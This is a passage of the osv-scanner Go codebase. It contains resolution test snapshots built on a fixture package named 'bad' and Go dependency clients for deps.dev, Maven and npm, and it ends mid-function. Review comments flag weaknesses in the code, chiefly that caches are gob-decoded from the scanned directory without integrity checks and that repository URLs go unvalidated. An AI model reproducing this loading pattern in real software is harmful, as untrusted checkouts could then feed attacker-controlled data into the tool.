"Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad2", "VersionType": 1, "Version": "1.0.0" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/direct - 1] direct 1.0.0 └─ reg|Selector="" | bad@^2.0.0 2.2.2 --- [TestResolve/direct - 2] [ { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "direct", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", 
"Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/duplicates - 1] duplicates 1.1.1 ├─ reg|KnownAs="bad-aliased"|Selector="" | bad@^1.0.0 1.1.1 ├─ reg|Selector="" | dependency@^2.0.0 2.0.0 │ └─ reg|Selector="" | bad@^2.0.0 2.2.2 └─ reg|KnownAs="dependency-v1"|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/duplicates - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 5, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ] }, "5": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { 
"From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 4, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 2, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 5, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ] }, "5": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/existing - 1] existing 1.0.0 └─ opt|Selector="" | dependency@^2.0.0 2.0.0 └─ reg|Selector="" | bad@^2.0.0 2.2.2 --- [TestResolve/existing - 2] [ { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "existing", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": 
"dependency", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/non-problem - 1] non-problem 1.0.0 ├─ 1: reg|Selector="" | bad@^1.0.0 1.1.1 └─ reg|Selector="" | dependency@^3.0.0 3.0.0 └─ $1@* --- [TestResolve/non-problem - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "non-problem", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ], "Children": null }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ] } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "non-problem", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": 
"^1.0.0", "Type": {} }, { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ], "Children": null }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ] } } } ] } ] --- [TestResolve/simple - 1] simple 1.0.0 └─ reg|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/simple - 2] [ { "ID": "OSV-000-000", "DevOnly": true, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "simple", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": true, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "simple", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": 
"^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- ================================================ FILE: internal/resolution/client/client.go ================================================ // Package client defines the clients for resolving dependencies for various ecosystems. package client import ( "context" "crypto/x509" pb "deps.dev/api/v3" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/version" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) type ResolutionClient struct { DependencyClient clientinterfaces.VulnerabilityMatcher } type DependencyClient interface { resolve.Client // WriteCache writes a manifest-specific resolution cache. WriteCache(filepath string) error // LoadCache loads a manifest-specific resolution cache. LoadCache(filepath string) error // AddRegistries adds the specified registries to fetch data. AddRegistries(registries []Registry) error } type Registry any // PreFetch loads cache, then makes and caches likely queries needed for resolving a package with a list of requirements func PreFetch(ctx context.Context, c DependencyClient, requirements []resolve.RequirementVersion, manifestPath string) { // It doesn't matter if loading the cache fails _ = c.LoadCache(manifestPath) certPool, err := x509.SystemCertPool() if err != nil { return } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{ grpc.WithTransportCredentials(creds), grpc.WithUserAgent("osv-scanner/" + version.OSVVersion), } conn, err := grpc.NewClient(depsdev.DepsdevAPI, dialOpts...) 
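	if err != nil {
		return
	}
	// conn is used only by the synchronous GetDependencies calls in the loop below
	// (the goroutines started further down go through c, not conn), so release it
	// when PreFetch returns rather than leaving it open.
	defer conn.Close()
	insights := pb.NewInsightsClient(conn)

	// Use the deps.dev client to fetch complete dependency graphs of our direct imports
	for _, im := range requirements {
		// There are potentially a huge number of management/import dependencies.
		if im.Type.HasAttr(dep.MavenDependencyOrigin) {
			continue
		}

		var vk resolve.Version
		var constraint *semver.Constraint
		// Maven registry client may be slow calling MatchingVersions which makes requests to `maven-metadata.xml`.
		// We can avoid this by only calling MatchingVersions for non-soft requirements.
		if im.System == resolve.Maven {
			if constraint, err = semver.Maven.ParseConstraint(im.Version); err != nil {
				continue
			}
		}
		if constraint != nil && constraint.IsSimple() {
			// If the requirement is a simple version, use it as the VersionKey,
			// so we do not need to call MatchingVersions to get available versions.
			vk = resolve.Version{
				VersionKey: im.VersionKey,
			}
		} else {
			// Get the preferred version of the import requirement
			vks, err := c.MatchingVersions(ctx, im.VersionKey)
			if err != nil || len(vks) == 0 {
				continue
			}
			vk = vks[len(vks)-1]
		}

		// Make a request for the precomputed dependency tree.
		// This sends the name and version of each direct requirement to the endpoint
		// in depsdev.DepsdevAPI.
		// NOTE(review): for manifests that reference private or internal package
		// names, confirm that disclosing them to that service is acceptable.
		resp, err := insights.GetDependencies(ctx, &pb.GetDependenciesRequest{
			VersionKey: &pb.VersionKey{
				System:  pb.System(vk.System),
				Name:    vk.Name,
				Version: vk.Version,
			},
		})
		if err != nil {
			continue
		}

		// Send off queries to cache the packages in the dependency tree
		nodes := resp.GetNodes()
		for _, node := range nodes {
			pbvk := node.GetVersionKey()

			vk := resolve.VersionKey{
				PackageKey: resolve.PackageKey{
					System: resolve.System(pbvk.GetSystem()),
					Name:   pbvk.GetName(),
				},
				Version:     pbvk.GetVersion(),
				VersionType: resolve.Concrete,
			}

			// TODO: We might want to limit the number of goroutines this creates.
			// Up to three goroutines are started per node of every returned tree, so
			// the total is driven by the size of the responses, not by the caller.
			go c.Requirements(ctx, vk) //nolint:errcheck
			go c.Version(ctx, vk)      //nolint:errcheck
			if vk.System != resolve.Maven {
				// Avoid making requests to `maven-metadata.xml`
				go c.Versions(ctx, vk.PackageKey) //nolint:errcheck
			}
		}
	}
	// don't bother waiting for goroutines to finish.
}

================================================
FILE: internal/resolution/client/depsdev_client.go
================================================
package client

import (
	"encoding/gob"
	"os"

	"deps.dev/util/resolve"
	"github.com/google/osv-scanner/v2/internal/datasource"
)

// depsDevCacheExt is appended to the path given to WriteCache/LoadCache to form
// the cache file name.
const depsDevCacheExt = ".resolve.deps"

// DepsDevClient is a DependencyClient backed by the official resolve.APIClient,
// with a cached insights client that can be saved to and restored from disk.
type DepsDevClient struct {
	resolve.APIClient

	c *datasource.CachedInsightsClient
}

// NewDepsDevClient builds a DepsDevClient whose APIClient and cache share one
// CachedInsightsClient created for addr with the given user agent.
func NewDepsDevClient(addr string, userAgent string) (*DepsDevClient, error) {
	c, err := datasource.NewCachedInsightsClient(addr, userAgent)
	if err != nil {
		return nil, err
	}

	return &DepsDevClient{APIClient: *resolve.NewAPIClient(c), c: c}, nil
}

// AddRegistries is a no-op for this client; it always returns nil.
func (d *DepsDevClient) AddRegistries(_ []Registry) error { return nil }

// WriteCache gob-encodes the cached insights client into path + depsDevCacheExt.
//
// os.Create creates the file or truncates an existing one at that path. Because
// the path is derived from the manifest location, the write lands inside the
// directory being scanned.
// NOTE(review): when scanning trees you do not control, consider whether the
// cache should live outside the scanned directory.
func (d *DepsDevClient) WriteCache(path string) (err error) {
	f, err := os.Create(path + depsDevCacheExt)
	if err != nil {
		return err
	}
	// A failed Close on a written file can mean the data never reached disk, so
	// report it unless encoding already failed.
	defer func() {
		if cerr := f.Close(); err == nil {
			err = cerr
		}
	}()

	return gob.NewEncoder(f).Encode(d.c)
}

// LoadCache gob-decodes path + depsDevCacheExt into the cached insights client.
//
// PreFetch in client.go passes the manifest path here, so the file is read from
// beside the manifest being scanned. Nothing in this function checks the file's
// origin or integrity: in an untrusted checkout its contents are whatever the
// checkout's author put there.
// NOTE(review): confirm how CachedInsightsClient validates and bounds what it
// decodes, and whether cached entries can stand in for live deps.dev answers.
func (d *DepsDevClient) LoadCache(path string) error {
	f, err := os.Open(path + depsDevCacheExt)
	if err != nil {
		return err
	}
	defer f.Close()

	return gob.NewDecoder(f).Decode(&d.c)
}

================================================
FILE: internal/resolution/client/helper.go
================================================
package client

import (
	"deps.dev/util/resolve"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/resolution/util"
)

// GraphToInventory is a helper function to convert a Graph into a list of Packages
// for use with VulnerabilityMatcher. The root node (g.Nodes[0]) is left out.
// It returns nil for a nil graph or a graph with no nodes.
func GraphToInventory(g *resolve.Graph) []*extractor.Package {
	// Without this guard len(g.Nodes)-1 is negative for an empty graph and both
	// make() and g.Nodes[1:] panic.
	if g == nil || len(g.Nodes) == 0 {
		return nil
	}
	// g.Nodes[0] is the root node of the graph that should be excluded.
	inv := make([]*extractor.Package, len(g.Nodes)-1)
	for i, n := range g.Nodes[1:] {
		inv[i] = &extractor.Package{
			Name:     n.Version.Name,
			Version:  n.Version.Version,
			PURLType: util.PURLType[n.Version.System],
		}
	}

	return inv
}

================================================
FILE: internal/resolution/client/maven_registry_client.go
================================================
package client

import (
	"context"
	"encoding/gob"
	"errors"
	"fmt"
	"os"
	"strings"

	"deps.dev/util/maven"
	"deps.dev/util/resolve"
	"deps.dev/util/resolve/version"
	"github.com/google/osv-scanner/v2/internal/datasource"
	mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven"
)

// mavenRegistryCacheExt is appended to the path given to WriteCache/LoadCache to
// form the cache file name.
const mavenRegistryCacheExt = ".resolve.maven"

// MavenRegistryClient resolves Maven packages through a MavenRegistryAPIClient.
type MavenRegistryClient struct {
	api *datasource.MavenRegistryAPIClient
}

// NewMavenRegistryClient creates a client for the registry at the given URL with
// releases enabled.
func NewMavenRegistryClient(registry string) (*MavenRegistryClient, error) {
	client, err := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: registry, ReleasesEnabled: true})
	if err != nil {
		return nil, err
	}

	return &MavenRegistryClient{api: client}, nil
}

// Version fetches the project for vk and returns vk with the project's declared
// repositories recorded in the Registries attribute.
// NOTE(review): unlike Versions and Requirements, this method does not reject a
// vk whose System is not Maven — confirm callers only pass Maven keys.
func (c *MavenRegistryClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) {
	g, a, found := strings.Cut(vk.Name, ":")
	if !found {
		return resolve.Version{}, fmt.Errorf("invalid Maven package name %s", vk.Name)
	}
	proj, err := c.api.GetProject(ctx, g, a, vk.Version)
	if err != nil {
		return resolve.Version{}, err
	}

	regs := make([]string, len(proj.Repositories))
	// Repositories are served as dependency registries.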
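	// https://github.com/google/deps.dev/blob/main/util/resolve/api.go#L106
	// repo.URL is taken from the fetched project as-is; this function does not
	// validate its scheme or host before recording it.
	for i, repo := range proj.Repositories {
		regs[i] = "dep:" + string(repo.URL)
	}
	var attr version.AttrSet
	if len(regs) > 0 {
		attr.SetAttr(version.Registries, strings.Join(regs, "|"))
	}

	return resolve.Version{VersionKey: vk, AttrSet: attr}, nil
}

// Versions returns all available versions of the given package from the maven-metadata.xml file
//
// TODO: we should also include versions not listed in the metadata file
// There exist versions in the repository but not listed in the metadata file,
// for example version 20030203.000550 of package commons-io:commons-io
// https://repo1.maven.org/maven2/commons-io/commons-io/20030203.000550/.
// A package may depend on such version if a soft requirement of this version
// is declared.
// We need to find out if there are such versions and include them in the
// returned versions.
func (c *MavenRegistryClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) {
	if pk.System != resolve.Maven {
		return nil, fmt.Errorf("wrong system: %v", pk.System)
	}

	// Maven package names are "groupID:artifactID".
	g, a, found := strings.Cut(pk.Name, ":")
	if !found {
		return nil, fmt.Errorf("invalid Maven package name %s", pk.Name)
	}
	versions, err := c.api.GetVersions(ctx, g, a)
	if err != nil {
		return nil, err
	}

	vks := make([]resolve.Version, len(versions))
	for i, v := range versions {
		vks[i] = resolve.Version{
			VersionKey: resolve.VersionKey{
				PackageKey:  pk,
				Version:     string(v),
				VersionType: resolve.Concrete,
			}}
	}

	return vks, nil
}

// Requirements returns the dependencies declared by the project for vk, after
// merging default profiles and parent projects and processing dependency
// management.
func (c *MavenRegistryClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) {
	if vk.System != resolve.Maven {
		return nil, fmt.Errorf("wrong system: %v", vk.System)
	}

	g, a, found := strings.Cut(vk.Name, ":")
	if !found {
		return nil, fmt.Errorf("invalid Maven package name %s", vk.Name)
	}
	proj, err := c.api.GetProject(ctx, g, a, vk.Version)
	if err != nil {
		return nil, err
	}

	// Only merge default profiles by passing empty JDK and OS information.
	if err := proj.MergeProfiles("", maven.ActivationOS{}); err != nil {
		return nil, err
	}

	// We should not add registries defined in dependencies pom.xml files.
	// Those POMs are third-party content, so the parent and dependency-management
	// lookups below use the client returned by WithoutRegistries() instead of c.api.
	// NOTE(review): presumably this keeps a dependency's own repository
	// declarations from steering further fetches — confirm against WithoutRegistries.
	apiWithoutRegistries := c.api.WithoutRegistries()
	// We need to merge parents for potential dependencies in parents.
	if err := mavenutil.MergeParents(ctx, apiWithoutRegistries, &proj, proj.Parent, 1, "", false); err != nil {
		return nil, err
	}
	proj.ProcessDependencies(func(groupID, artifactID, version maven.String) (maven.DependencyManagement, error) {
		return mavenutil.GetDependencyManagement(ctx, apiWithoutRegistries, groupID, artifactID, version)
	})

	reqs := make([]resolve.RequirementVersion, 0, len(proj.Dependencies))
	for _, d := range proj.Dependencies {
		reqs = append(reqs, resolve.RequirementVersion{
			VersionKey: resolve.VersionKey{
				PackageKey: resolve.PackageKey{
					System: resolve.Maven,
					Name:   d.Name(),
				},
				VersionType: resolve.Requirement,
				Version:     string(d.Version),
			},
			Type: resolve.MavenDepType(d, ""),
		})
	}

	return reqs, nil
}

// MatchingVersions returns the versions from Versions that satisfy the
// requirement in vk.
func (c *MavenRegistryClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) {
	if vk.System != resolve.Maven {
		return nil, fmt.Errorf("wrong system: %v", vk.System)
	}

	versions, err := c.Versions(ctx, vk.PackageKey)
	if err != nil {
		return nil, err
	}

	return resolve.MatchRequirement(vk, versions), nil
}

// AddRegistries adds each entry to the underlying API client. Every entry must be
// a datasource.MavenRegistry; the first entry of another type, or the first
// AddRegistry error, stops processing (earlier entries stay added).
func (c *MavenRegistryClient) AddRegistries(registries []Registry) error {
	for _, reg := range registries {
		specific, ok := reg.(datasource.MavenRegistry)
		if !ok {
			return errors.New("invalid Maven registry information")
		}
		if err := c.api.AddRegistry(specific); err != nil {
			return err
		}
	}

	return nil
}

// WriteCache gob-encodes the registry API client into path + mavenRegistryCacheExt.
//
// os.Create creates the file or truncates an existing one at that path, which is
// derived from the manifest location and so lies inside the scanned directory.
func (c *MavenRegistryClient) WriteCache(path string) (err error) {
	f, err := os.Create(path + mavenRegistryCacheExt)
	if err != nil {
		return err
	}
	// A failed Close on a written file can mean the data never reached disk, so
	// report it unless encoding already failed.
	defer func() {
		if cerr := f.Close(); err == nil {
			err = cerr
		}
	}()

	return gob.NewEncoder(f).Encode(c.api)
}

// LoadCache gob-decodes path + mavenRegistryCacheExt into the registry API client.
//
// The file is read from beside the manifest and is not checked for origin or
// integrity here; in an untrusted checkout its contents are author-controlled.
// NOTE(review): confirm how MavenRegistryAPIClient validates and bounds what it
// decodes, including any registry information carried in the cache.
func (c *MavenRegistryClient) LoadCache(path string) error {
	f, err := os.Open(path + mavenRegistryCacheExt)
	if err != nil {
		return err
	}
	defer f.Close()

	return gob.NewDecoder(f).Decode(&c.api)
}

================================================
FILE: internal/resolution/client/npm_registry_client.go
================================================
package client

import (
	"context"
	"crypto/x509"
	"encoding/gob"
	"fmt"
	"os"
	"slices"
	"strings"

	pb "deps.dev/api/v3"
	"deps.dev/util/resolve"
	"deps.dev/util/resolve/dep"
	"deps.dev/util/semver"
	"github.com/google/osv-scanner/v2/internal/datasource"
	"github.com/google/osv-scanner/v2/internal/depsdev"
	"github.com/google/osv-scanner/v2/internal/version"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials"
)

// npmRegistryCacheExt is appended to the path given to WriteCache/LoadCache to
// form the cache file name.
const npmRegistryCacheExt = ".resolve.npm"

// NpmRegistryClient resolves npm packages through the npm registry API, falling
// back to a deps.dev client for bundled dependencies.
type NpmRegistryClient struct {
	api *datasource.NpmRegistryAPIClient

	// Fallback client for dealing with bundleDependencies.
	ic       pb.InsightsClient
	fallback *resolve.APIClient
}

// NewNpmRegistryClient creates the registry client for workdir and dials the
// deps.dev API over TLS, verified against the system certificate pool, for the
// fallback client.
func NewNpmRegistryClient(workdir string) (*NpmRegistryClient, error) {
	api, err := datasource.NewNpmRegistryAPIClient(workdir)
	if err != nil {
		return nil, err
	}

	certPool, err := x509.SystemCertPool()
	if err != nil {
		return nil, fmt.Errorf("getting system cert pool: %w", err)
	}
	creds := credentials.NewClientTLSFromCert(certPool, "")
	dialOpts := []grpc.DialOption{
		grpc.WithTransportCredentials(creds),
		grpc.WithUserAgent("osv-scanner_fix/" + version.OSVVersion),
	}
	conn, err := grpc.NewClient(depsdev.DepsdevAPI, dialOpts...)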
if err != nil { return nil, fmt.Errorf("dialling %q: %w", depsdev.DepsdevAPI, err) } ic := pb.NewInsightsClient(conn) return &NpmRegistryClient{ api: api, ic: ic, fallback: resolve.NewAPIClient(ic), }, nil } func (c *NpmRegistryClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) { if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.Version(ctx, vk) } return resolve.Version{VersionKey: vk}, nil } func (c *NpmRegistryClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) { if isNpmBundle(pk) { // bundled dependencies, fallback to deps.dev client return c.fallback.Versions(ctx, pk) } vers, err := c.api.Versions(ctx, pk.Name) if err != nil { return nil, err } vks := make([]resolve.Version, len(vers.Versions)) for i, v := range vers.Versions { vks[i] = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }} } slices.SortFunc(vks, func(a, b resolve.Version) int { return semver.NPM.Compare(a.Version, b.Version) }) return vks, nil } func (c *NpmRegistryClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) { if vk.System != resolve.NPM { return nil, fmt.Errorf("unsupported system: %v", vk.System) } if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.Requirements(ctx, vk) } dependencies, err := c.api.Dependencies(ctx, vk.Name, vk.Version) if err != nil { return nil, err } // Preallocate the dependency slice, which will hold all the dependencies of each type. 
// The npm resolver expects bundled dependencies included twice in different forms: // {foo@*|Scope="bundle"} and {mangled-name-of>0.1.2>foo@1.2.3}, hence the 2*len(bundled) depCount := len(dependencies.Dependencies) + len(dependencies.DevDependencies) + len(dependencies.OptionalDependencies) + len(dependencies.PeerDependencies) + 2*len(dependencies.BundleDependencies) deps := make([]resolve.RequirementVersion, 0, depCount) addDeps := func(ds map[string]string, t dep.Type) { for name, req := range ds { typ := t.Clone() if r, ok := strings.CutPrefix(req, "npm:"); ok { // This dependency is aliased, add it as a // dependency on the actual name, with the // KnownAs attribute set to the alias. typ.AddAttr(dep.KnownAs, name) name = r req = "" if i := strings.LastIndex(r, "@"); i > 0 { name = r[:i] req = r[i+1:] } } deps = append(deps, resolve.RequirementVersion{ Type: typ, VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Requirement, Version: req, }, }) } } addDeps(dependencies.Dependencies, dep.NewType()) addDeps(dependencies.DevDependencies, dep.NewType(dep.Dev)) addDeps(dependencies.OptionalDependencies, dep.NewType(dep.Opt)) peerType := dep.NewType() peerType.AddAttr(dep.Scope, "peer") addDeps(dependencies.PeerDependencies, peerType) // The resolver expects bundleDependencies to be present as regular // dependencies with a "*" version specifier, even if they were already // in the regular dependencies. bundleType := dep.NewType() bundleType.AddAttr(dep.Scope, "bundle") for _, name := range dependencies.BundleDependencies { deps = append(deps, resolve.RequirementVersion{ Type: bundleType, VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Requirement, Version: "*", }, }) } // Correctly resolving the bundled dependencies would require downloading the package. 
// Instead, call the fallback deps.dev client to get the bundled dependencies with mangled names. if len(dependencies.BundleDependencies) > 0 { fallbackReqs, err := c.fallback.Requirements(ctx, vk) if err != nil { // TODO: make some placeholder if the package doesn't exist on deps.dev return nil, err } for _, req := range fallbackReqs { if isNpmBundle(req.PackageKey) { deps = append(deps, req) } } } resolve.SortDependencies(deps) return deps, nil } func (c *NpmRegistryClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) { if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.MatchingVersions(ctx, vk) } versions, err := c.api.Versions(ctx, vk.Name) if err != nil { return nil, err } if concVer, ok := versions.Tags[vk.Version]; ok { // matched a tag, return just the concrete version of the tag return []resolve.Version{{ VersionKey: resolve.VersionKey{ PackageKey: vk.PackageKey, Version: concVer, VersionType: resolve.Concrete, }, }}, nil } resVersions := make([]resolve.Version, len(versions.Versions)) for i, v := range versions.Versions { resVersions[i] = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: vk.PackageKey, Version: v, VersionType: 